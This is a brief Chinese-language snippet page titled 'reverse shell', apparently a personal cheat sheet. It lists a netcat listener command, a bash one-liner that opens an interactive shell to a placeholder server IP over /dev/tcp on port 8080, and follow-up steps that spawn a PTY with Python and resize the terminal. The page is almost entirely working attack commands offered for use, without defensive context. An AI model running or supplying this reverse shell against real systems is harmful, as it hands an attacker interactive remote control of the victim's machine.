todo

反弹shell

up:2021-10-28 16:08:45 edit:2021-10-28 16:08:45 view:595

反弹shell


服务端

stty raw -echo ; nc -vlp 8080;reset


客户端

bash -i &>/dev/tcp/your_server_ip/8080 <&1


客户端连接后执行

python -c 'import pty;pty.spawn("bash")'

stty size
stty rows 47
stty columns 209
stty size


not in sinaapp